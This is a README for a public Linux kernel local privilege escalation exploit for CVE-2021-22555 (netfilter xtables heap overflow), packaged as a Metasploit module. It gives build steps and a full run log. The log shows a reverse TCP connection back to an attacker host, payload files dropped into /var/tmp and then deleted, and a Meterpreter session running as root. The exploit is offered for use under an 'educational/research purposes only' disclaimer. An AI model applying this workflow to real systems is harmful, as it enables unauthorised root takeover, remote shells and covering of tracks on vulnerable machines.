# Netfilter_xtables_Heap_OOB_Write_Privilege_Escalation_CVE-2021-22555

LPE exploit for CVE-2021-22555. Tested on Ubuntu 20.04 kernel 5.8.0-48-generic.
The vulnerability was discovered by Andy Nguyen [@theflow0](https://twitter.com/theflow0).

Author: [Szymon Janusz](https://github.com/szymonj99)

For educational/research purposes only. Use at your own risk.

## Usage:

The exploit binary **must** be built on a Linux environment as it relies on Linux header files.

To build:
```
make ubuntu
```

To run:
```
msf6 exploit(linux/local/netfilter_xtables_heap_oob_write_priv_esc) > run

[*] Started reverse TCP handler on 192.168.1.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is running kernel release 5.8.0-48-generic.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/var/tmp/flTJOaqhI' (734660 bytes) ...
[*] Uploading payload...
[*] Writing '/var/tmp/ckaFBkiL' (250 bytes) ...
[*] Running payload on remote system...
[*] Sending stage (3012548 bytes) to 192.168.1.67
[+] Deleted /var/tmp/flTJOaqhI
[+] Deleted /var/tmp/ckaFBkiL
[*] Meterpreter session 2 opened (192.168.1.145:4444 -> 192.168.1.67:43322) at 2021-09-28 14:20:41 +0100
[*] Payload executed!

meterpreter > getuid
Server username: root @ ubuntu-virtual-machine (uid=0, gid=0, euid=0, egid=0)
```

Checkout the writeup [CVE-2021-22555: Turning \x00\x00 into 10000$](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html).
